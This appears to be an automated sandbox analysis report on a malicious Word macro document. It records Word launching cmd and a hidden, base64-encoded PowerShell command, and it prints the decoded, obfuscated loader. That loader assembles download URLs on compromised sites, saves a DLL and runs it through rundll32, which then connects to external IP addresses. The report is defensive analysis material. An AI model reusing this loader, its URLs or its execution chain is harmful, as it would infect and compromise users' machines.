Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D55 mov eax, dword ptr fs:[00000030h]7_2_10003D55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.49.88.46 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 71.72.196.159 80
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogAJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogAJump to behavior
